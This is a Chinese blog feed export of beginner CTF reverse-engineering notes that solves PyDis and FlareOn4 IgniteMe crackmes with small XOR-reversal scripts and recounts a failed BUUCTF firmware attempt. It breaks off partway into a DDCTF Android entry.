<content type="html"><![CDATA[<h3 id="PyDis"><a href="#PyDis" class="headerlink" title="PyDis"></a>PyDis</h3><p>这个题应该是<code>rx</code>仿今年的<code>hgame</code>的那一个<code>pypy</code>……</p><p>先把<code>pyc</code>转成<code>byte_code</code>:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> dis,marshal</span><br><span class="line">f=<span class="built_in">open</span>(<span class="string">"pyre.cpython-39.pyc"</span>,<span class="string">"rb"</span>).read()</span><br><span class="line"></span><br><span class="line">code = marshal.loads(f[<span class="number">16</span>:])</span><br><span class="line"></span><br><span class="line">dis.dis(code)</span><br></pre></td></tr></table></figure><p>没错,我就是嫖含树的(理直气壮</p><p>然后硬刚<code>byte_code</code>:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br></pre></td><td class="code"><pre><span class="line"> <span class="number">1</span> <span class="number">0</span> BUILD_LIST <span class="number">0</span></span><br><span class="line"> <span class="number">2</span> LOAD_CONST <span class="number">0</span> ((<span class="number">178</span>, <span class="number">184</span>, <span class="number">185</span>, <span class="number">191</span>, <span class="number">182</span>, <span class="number">165</span>, <span class="number">174</span>, <span class="number">191</span>, <span class="number">129</span>, <span class="number">183</span>, <span class="number">187</span>, <span class="number">176</span>, <span class="number">129</span>, <span class="number">169</span>, <span class="number">191</span>, <span class="number">167</span>, <span class="number">163</span>))</span><br><span class="line"> <span class="number">4</span> CALL_FINALLY <span class="number">1</span> (to <span class="number">7</span>)</span><br><span class="line"> <span class="number">6</span> STORE_NAME <span class="number">0</span> (magic)</span><br><span class="line"></span><br><span class="line"> <span class="number">2</span> <span class="number">8</span> LOAD_NAME <span class="number">1</span> (<span class="built_in">input</span>)</span><br><span class="line"> <span class="number">10</span> LOAD_CONST <span class="number">1</span> (<span class="string">'flag >>> '</span>)</span><br><span class="line"> <span class="number">12</span> CALL_FUNCTION <span class="number">1</span></span><br><span class="line"> <span class="number">14</span> STORE_NAME <span class="number">2</span> (inp)</span><br><span class="line"></span><br><span class="line"> <span class="number">4</span> <span class="number">16</span> LOAD_NAME <span class="number">3</span> (<span class="built_in">list</span>)</span><br><span class="line"> <span class="number">18</span> LOAD_NAME <span class="number">2</span> (inp)</span><br><span class="line"> <span class="number">20</span> CALL_FUNCTION <span class="number">1</span></span><br><span class="line"> <span class="number">22</span> STORE_NAME <span class="number">4</span> (flag)</span><br><span class="line"></span><br><span class="line"> <span class="number">5</span> <span class="number">24</span> LOAD_NAME <span class="number">5</span> (<span class="built_in">len</span>)</span><br><span class="line"> <span class="number">26</span> LOAD_NAME <span class="number">4</span> (flag)</span><br><span class="line"> <span class="number">28</span> CALL_FUNCTION <span class="number">1</span></span><br><span class="line"> <span class="number">30</span> LOAD_NAME <span class="number">5</span> (<span class="built_in">len</span>)</span><br><span class="line"> <span class="number">32</span> LOAD_NAME <span class="number">0</span> (magic)</span><br><span class="line"> <span class="number">34</span> CALL_FUNCTION <span class="number">1</span></span><br><span class="line"> <span class="number">36</span> COMPARE_OP <span class="number">3</span> (!=)</span><br><span class="line"> <span class="number">38</span> POP_JUMP_IF_FALSE <span class="number">54</span></span><br><span class="line"></span><br><span class="line"> <span class="number">6</span> <span class="number">40</span> LOAD_NAME <span class="number">6</span> (<span class="built_in">print</span>)</span><br><span class="line"> <span class="number">42</span> LOAD_CONST <span class="number">2</span> (<span class="string">'qwq'</span>)</span><br><span class="line"> <span class="number">44</span> CALL_FUNCTION <span class="number">1</span></span><br><span class="line"> <span class="number">46</span> POP_TOP</span><br><span class="line"></span><br><span class="line"> <span class="number">7</span> <span class="number">48</span> LOAD_NAME <span class="number">7</span> (exit)</span><br><span class="line"> <span class="number">50</span> CALL_FUNCTION <span class="number">0</span></span><br><span class="line"> <span class="number">52</span> POP_TOP</span><br><span class="line"></span><br><span class="line"> <span class="number">9</span> >> <span class="number">54</span> LOAD_NAME <span class="number">8</span> (<span class="built_in">range</span>)</span><br><span class="line"> <span class="number">56</span> LOAD_NAME <span class="number">5</span> (<span class="built_in">len</span>)</span><br><span class="line"> <span class="number">58</span> LOAD_NAME <span class="number">4</span> (flag)</span><br><span class="line"> <span class="number">60</span> CALL_FUNCTION <span class="number">1</span></span><br><span class="line"> <span class="number">62</span> LOAD_CONST <span class="number">3</span> (<span class="number">2</span>)</span><br><span class="line"> <span class="number">64</span> BINARY_FLOOR_DIVIDE</span><br><span class="line"> <span class="number">66</span> CALL_FUNCTION <span class="number">1</span></span><br><span class="line"> <span class="number">68</span> GET_ITER</span><br><span class="line"> >> <span class="number">70</span> FOR_ITER <span class="number">54</span> (to <span class="number">126</span>)</span><br><span class="line"> <span class="number">72</span> STORE_NAME <span class="number">9</span> (i)</span><br><span class="line"></span><br><span class="line"><span class="number">10</span> <span class="number">74</span> LOAD_NAME <span class="number">4</span> (flag)</span><br><span class="line"> <span class="number">76</span> LOAD_CONST <span class="number">3</span> (<span class="number">2</span>)</span><br><span class="line"> <span class="number">78</span> LOAD_NAME <span class="number">9</span> (i)</span><br><span class="line"> <span class="number">80</span> BINARY_MULTIPLY</span><br><span class="line"> <span class="number">82</span> LOAD_CONST <span class="number">4</span> (<span class="number">1</span>)</span><br><span class="line"> <span class="number">84</span> BINARY_ADD</span><br><span class="line"> <span class="number">86</span> BINARY_SUBSCR</span><br><span class="line"> <span class="number">88</span> LOAD_NAME <span class="number">4</span> (flag)</span><br><span class="line"> <span class="number">90</span> LOAD_CONST <span class="number">3</span> (<span class="number">2</span>)</span><br><span class="line"> <span class="number">92</span> LOAD_NAME <span class="number">9</span> (i)</span><br><span class="line"> <span class="number">94</span> BINARY_MULTIPLY</span><br><span class="line"> <span class="number">96</span> BINARY_SUBSCR</span><br><span class="line"> <span class="number">98</span> ROT_TWO</span><br><span class="line"> <span class="number">100</span> LOAD_NAME <span class="number">4</span> (flag)</span><br><span class="line"> <span class="number">102</span> LOAD_CONST <span class="number">3</span> (<span class="number">2</span>)</span><br><span class="line"> <span class="number">104</span> LOAD_NAME <span class="number">9</span> (i)</span><br><span class="line"> <span class="number">106</span> BINARY_MULTIPLY</span><br><span class="line"> <span class="number">108</span> STORE_SUBSCR</span><br><span class="line"> <span class="number">110</span> LOAD_NAME <span class="number">4</span> (flag)</span><br><span class="line"> <span class="number">112</span> LOAD_CONST <span class="number">3</span> (<span class="number">2</span>)</span><br><span class="line"> <span class="number">114</span> LOAD_NAME <span class="number">9</span> (i)</span><br><span class="line"> <span class="number">116</span> BINARY_MULTIPLY</span><br><span class="line"> <span class="number">118</span> LOAD_CONST <span class="number">4</span> (<span class="number">1</span>)</span><br><span class="line"> <span class="number">120</span> BINARY_ADD</span><br><span class="line"> <span class="number">122</span> STORE_SUBSCR</span><br><span class="line"> <span class="number">124</span> JUMP_ABSOLUTE <span class="number">70</span></span><br><span class="line"></span><br><span class="line"><span class="number">12</span> >> <span class="number">126</span> BUILD_LIST <span class="number">0</span></span><br><span class="line"> <span class="number">128</span> STORE_NAME <span class="number">10</span> (check)</span><br><span class="line"></span><br><span class="line"><span class="number">14</span> <span class="number">130</span> LOAD_NAME <span class="number">8</span> (<span class="built_in">range</span>)</span><br><span class="line"> <span class="number">132</span> LOAD_NAME <span class="number">5</span> (<span class="built_in">len</span>)</span><br><span class="line"> <span class="number">134</span> LOAD_NAME <span class="number">4</span> (flag)</span><br><span class="line"> <span class="number">136</span> CALL_FUNCTION <span class="number">1</span></span><br><span class="line"> <span class="number">138</span> CALL_FUNCTION <span class="number">1</span></span><br><span class="line"> <span class="number">140</span> GET_ITER</span><br><span class="line"> >> <span class="number">142</span> FOR_ITER <span class="number">26</span> (to <span class="number">170</span>)</span><br><span class="line"> <span class="number">144</span> STORE_NAME <span class="number">9</span> (i)</span><br><span class="line"></span><br><span class="line"><span class="number">15</span> <span class="number">146</span> LOAD_NAME <span class="number">10</span> (check)</span><br><span class="line"> <span class="number">148</span> LOAD_METHOD <span class="number">11</span> (append)</span><br><span class="line"> <span class="number">150</span> LOAD_NAME <span class="number">12</span> (<span class="built_in">ord</span>)</span><br><span class="line"> <span class="number">152</span> LOAD_NAME <span class="number">4</span> (flag)</span><br><span class="line"> <span class="number">154</span> LOAD_NAME <span class="number">9</span> (i)</span><br><span class="line"> <span class="number">156</span> BINARY_SUBSCR</span><br><span class="line"> <span class="number">158</span> CALL_FUNCTION <span class="number">1</span></span><br><span class="line"> <span class="number">160</span> LOAD_CONST <span class="number">5</span> (<span class="number">222</span>)</span><br><span class="line"> <span class="number">162</span> BINARY_XOR</span><br><span class="line"> <span class="number">164</span> CALL_METHOD <span class="number">1</span></span><br><span class="line"> <span class="number">166</span> POP_TOP</span><br><span class="line"> <span class="number">168</span> JUMP_ABSOLUTE <span class="number">142</span></span><br><span class="line"></span><br><span class="line"><span class="number">17</span> >> <span class="number">170</span> LOAD_NAME <span class="number">8</span> (<span class="built_in">range</span>)</span><br><span class="line"> <span class="number">172</span> LOAD_NAME <span class="number">5</span> (<span class="built_in">len</span>)</span><br><span class="line"> <span class="number">174</span> LOAD_NAME <span class="number">0</span> (magic)</span><br><span class="line"> <span class="number">176</span> CALL_FUNCTION <span class="number">1</span></span><br><span class="line"> <span class="number">178</span> CALL_FUNCTION <span class="number">1</span></span><br><span class="line"> <span class="number">180</span> GET_ITER</span><br><span class="line"> >> <span class="number">182</span> FOR_ITER <span class="number">34</span> (to <span class="number">218</span>)</span><br><span class="line"> <span class="number">184</span> STORE_NAME <span class="number">9</span> (i)</span><br><span class="line"></span><br><span class="line"><span class="number">18</span> <span class="number">186</span> LOAD_NAME <span class="number">10</span> (check)</span><br><span class="line"> <span class="number">188</span> LOAD_NAME <span class="number">9</span> (i)</span><br><span class="line"> <span class="number">190</span> BINARY_SUBSCR</span><br><span class="line"> <span class="number">192</span> LOAD_NAME <span class="number">0</span> (magic)</span><br><span class="line"> <span class="number">194</span> LOAD_NAME <span class="number">9</span> (i)</span><br><span class="line"> <span class="number">196</span> BINARY_SUBSCR</span><br><span class="line"> <span class="number">198</span> COMPARE_OP <span class="number">3</span> (!=)</span><br><span class="line"> <span class="number">200</span> POP_JUMP_IF_FALSE <span class="number">182</span></span><br><span class="line"></span><br><span class="line"><span class="number">19</span> <span class="number">202</span> LOAD_NAME <span class="number">6</span> (<span class="built_in">print</span>)</span><br><span class="line"> <span class="number">204</span> LOAD_CONST <span class="number">2</span> (<span class="string">'qwq'</span>)</span><br><span class="line"> <span class="number">206</span> CALL_FUNCTION <span class="number">1</span></span><br><span class="line"> <span class="number">208</span> POP_TOP</span><br><span class="line"></span><br><span class="line"><span class="number">20</span> <span class="number">210</span> LOAD_NAME <span class="number">7</span> (exit)</span><br><span class="line"> <span class="number">212</span> CALL_FUNCTION <span class="number">0</span></span><br><span class="line"> <span class="number">214</span> POP_TOP</span><br><span class="line"> <span class="number">216</span> JUMP_ABSOLUTE <span class="number">182</span></span><br><span class="line"></span><br><span class="line"><span class="number">22</span> >> <span class="number">218</span> LOAD_NAME <span class="number">6</span> (<span class="built_in">print</span>)</span><br><span class="line"> <span class="number">220</span> LOAD_CONST <span class="number">6</span> (<span class="string">'happy new year!'</span>)</span><br><span class="line"> <span class="number">222</span> CALL_FUNCTION <span class="number">1</span></span><br><span class="line"> <span class="number">224</span> POP_TOP</span><br><span class="line"> <span class="number">226</span> LOAD_CONST <span class="number">7</span> (<span class="literal">None</span>)</span><br><span class="line"> <span class="number">228</span> RETURN_VALUE</span><br></pre></td></tr></table></figure><p>不是很难:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">magic = [<span class="number">178</span>, <span class="number">184</span>, <span class="number">185</span>, <span class="number">191</span>, <span class="number">182</span>, <span class="number">165</span>, <span class="number">174</span>, <span class="number">191</span>, <span class="number">129</span>, <span class="number">183</span>, <span class="number">187</span>, <span class="number">176</span>, <span class="number">129</span>, <span class="number">169</span>, <span class="number">191</span>, <span class="number">167</span>, <span class="number">163</span>]</span><br><span class="line">inp = <span class="built_in">input</span>(<span class="string">"flag>>> "</span>)</span><br><span class="line"></span><br><span class="line">flag = <span class="built_in">list</span>(inp)</span><br><span class="line"><span class="keyword">if</span> <span class="built_in">len</span>(magic) != <span class="built_in">len</span>(flag):</span><br><span class="line">print(<span class="string">'qwq'</span>)</span><br><span class="line">exit(<span class="number">0</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(flag)//<span class="number">2</span>):</span><br><span class="line">flag[i*<span class="number">2</span>],flag[i*<span class="number">2</span>+<span class="number">1</span>]=flag[i*<span class="number">2</span>+<span class="number">1</span>],flag[i*<span class="number">2</span>]</span><br><span class="line">check=[]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(flag)):</span><br><span class="line">check.append(<span class="built_in">ord</span>(flag[i]) ^ <span class="number">222</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(magic)):</span><br><span class="line"><span class="keyword">if</span> check[i] != magic[i]:</span><br><span class="line">print(<span class="string">'qwq'</span>)</span><br><span class="line">exit(<span class="number">0</span>)</span><br><span class="line">print(<span class="string">'happy new year!'</span>)</span><br></pre></td></tr></table></figure><p>写一下<code>exp</code>:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">check=[<span class="number">178</span>, <span class="number">184</span>, <span class="number">185</span>, <span class="number">191</span>, <span class="number">182</span>, <span class="number">165</span>, <span class="number">174</span>, <span class="number">191</span>, <span class="number">129</span>, <span class="number">183</span>, <span class="number">187</span>, <span class="number">176</span>, <span class="number">129</span>, <span class="number">169</span>, <span class="number">191</span>, <span class="number">167</span>, <span class="number">163</span>]</span><br><span class="line">flag=[]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> check:</span><br><span class="line">flag.append(<span class="built_in">chr</span>(i^<span class="number">222</span>))</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(flag)//<span class="number">2</span>):</span><br><span class="line">flag[i*<span class="number">2</span>],flag[i*<span class="number">2</span>+<span class="number">1</span>]=flag[i*<span class="number">2</span>+<span class="number">1</span>],flag[i*<span class="number">2</span>]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> flag:</span><br><span class="line">print(i,end=<span class="string">''</span>)</span><br></pre></td></tr></table></figure><h3 id="FlareOn4-IgniteMe"><a href="#FlareOn4-IgniteMe" class="headerlink" title="FlareOn4 IgniteMe"></a>FlareOn4 IgniteMe</h3><p>题确实比较简单,直接定位关键函数<code>sub_401050</code>,重命名一下:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">sub_401050</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">int</span> length; <span class="comment">// [esp+0h] [ebp-Ch]</span></span><br><span class="line"> <span class="keyword">int</span> i; <span class="comment">// [esp+4h] [ebp-8h]</span></span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">int</span> j; <span class="comment">// [esp+4h] [ebp-8h]</span></span><br><span class="line"> <span class="keyword">char</span> v4; <span class="comment">// [esp+Bh] [ebp-1h]</span></span><br><span class="line"></span><br><span class="line"> length = <span class="built_in">strlen</span>((<span class="keyword">int</span>)input);</span><br><span class="line"> v4 = sub_401000();</span><br><span class="line"> <span class="keyword">for</span> ( i = length - <span class="number">1</span>; i >= <span class="number">0</span>; --i )</span><br><span class="line"> {</span><br><span class="line"> rel[i] = v4 ^ input[i];</span><br><span class="line"> v4 = input[i];</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">for</span> ( j = <span class="number">0</span>; j < <span class="number">39</span>; ++j )</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">if</span> ( rel[j] != (<span class="keyword">unsigned</span> __int8)byte_403000[j] )</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>代码逻辑十分简单,然后就是那个v4不会算,动调一下就知道了。</p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week6/image-20210210201952993.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week6/image-20210210201952993.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20210210201952993"></p><p>写一下<code>exp</code>:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><bits/stdc++.h></span></span></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> <span class="built_in">std</span>;</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span>{</span><br><span class="line"><span class="keyword">int</span> rel[]={<span class="number">0x0D</span>,<span class="number">0x26</span>,<span class="number">0x49</span>,<span class="number">0x45</span>,<span class="number">0x2A</span>,<span class="number">0x17</span>,<span class="number">0x78</span>,<span class="number">0x44</span>,<span class="number">0x2B</span>,<span class="number">0x6C</span>,<span class="number">0x5D</span>,<span class="number">0x5E</span>,<span class="number">0x45</span>,<span class="number">0x12</span>,<span class="number">0x2F</span>,<span class="number">0x17</span>,<span class="number">0x2B</span>,<span class="number">0x44</span>,<span class="number">0x6F</span>,<span class="number">0x6E</span>,<span class="number">0x56</span>,<span class="number">0x9</span>,<span class="number">0x5F</span>,<span class="number">0x45</span>,<span class="number">0x47</span>,<span class="number">0x73</span>,<span class="number">0x26</span>,<span class="number">0x0A</span>,<span class="number">0x0D</span>,<span class="number">0x13</span>,<span class="number">0x17</span>,<span class="number">0x48</span>,<span class="number">0x42</span>,<span class="number">0x1</span>,<span class="number">0x40</span>,<span class="number">0x4D</span>,<span class="number">0x0C</span>,<span class="number">0x2</span>,<span class="number">0x69</span>,<span class="number">0x0</span>};</span><br><span class="line"><span class="keyword">char</span> flag[<span class="number">40</span>];</span><br><span class="line"><span class="keyword">int</span> v4=<span class="number">4</span>;</span><br><span class="line"><span class="keyword">for</span> ( <span class="keyword">int</span> i = <span class="number">38</span>; i >= <span class="number">0</span>; --i )</span><br><span class="line">{</span><br><span class="line">flag[i] = v4 ^ rel[i];</span><br><span class="line">v4 = flag[i];</span><br><span class="line">}</span><br><span class="line"><span class="built_in">cout</span><<<span class="string">"flag{"</span><<flag<<<span class="string">'}'</span>;</span><br><span class="line">} <span class="comment">//flag{[email protected]}</span></span><br></pre></td></tr></table></figure><h3 id="BUUCTF-Firmware"><a href="#BUUCTF-Firmware" class="headerlink" title="BUUCTF Firmware"></a>BUUCTF Firmware</h3><p>这尼玛……是啥????电子取证???还是MISC???还是IOT???</p><p>我还是按照<code>MISC</code>来处理吧……它给的是内存文件,里面应该有日志,配置文件啥的……(我猜的</p><p>所以我们先分离一下:</p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week6/image-20210210203337715.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week6/image-20210210203337715.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20210210203337715"></p><p>第一个空文件夹……第二个没看出来是个啥,第三个应该跟第二个是一样的,但我解压也没搞定……最后一个没见过。</p><p>我们先看一下最后一个的文件格式:</p><blockquote><p>SquashFS 是一套基于Linux内核使用的压缩只读文件系统。该文件系统能够压缩系统内的文档,inode以及目录,文件最大支持$2^{64}$字节。</p></blockquote><p>解析这个文件格式需要用一个工具<code>firm-mod-kit</code>,但是这个东西我死活装不上!!!</p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week6/image-20210211002414774.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week6/image-20210211002414774.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20210211002414774"></p><p>我又尝试用<code>ubuntu</code>自带的<code>unsquashfs</code>进行解析:</p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week6/image-20210211002436874.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week6/image-20210211002436874.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20210211002436874"></p><p>我又尝试挂载该文件:</p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week6/image-20210211002517829.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week6/image-20210211002517829.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20210211002517829"></p><p>草!!!!</p><p>最后还是没有解决……淦!!!网上有题解,感兴趣的直接百度……</p>]]></content>
<categories>
<category> CTF学习笔记 </category>
</categories>
<tags>
<tag> CTF </tag>
<tag> RE </tag>
</tags>
</entry>
<entry>
<title>Re学习之RX引路_week5</title>
<link href="2021/02/23/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week5/"/>
<url>2021/02/23/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week5/</url>
<content type="html"><![CDATA[<p>上周因为别的事情(帮忙校验电子取证的书,所以上周的题也就没有怎么搞。还有一个原因是我做安卓逆向的工具<code>AndroidKiller</code>挂了,一直也没修好(到现在还没修好……最后只能用Android逆向助手。</p><h3 id="DDCTF-Android-Easy"><a href="#DDCTF-Android-Easy" class="headerlink" title="DDCTF-Android Easy"></a>DDCTF-Android Easy</h3><p><code>dex2jar</code>,然后<code>jd-gui</code>:</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">FlagActivity</span> <span class="keyword">extends</span> <span class="title">d</span></span></span><br><span class="line"><span class="class"></span>{</span><br><span class="line"> <span class="keyword">private</span> <span class="keyword">static</span> String m = <span class="string">"com.didi_ctf.flagapp.FlagActivity"</span>;</span><br><span class="line"> <span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">final</span> <span class="keyword">byte</span>[] p = { -<span class="number">40</span>, -<span class="number">62</span>, <span class="number">107</span>, <span class="number">66</span>, -<span class="number">126</span>, <span class="number">103</span>, -<span class="number">56</span>, <span class="number">77</span>, <span class="number">122</span>, -<span class="number">107</span>, -<span class="number">24</span>, -<span class="number">127</span>, <span class="number">72</span>, -<span class="number">63</span>, -<span class="number">98</span>, <span class="number">64</span>, -<span class="number">24</span>, -<span 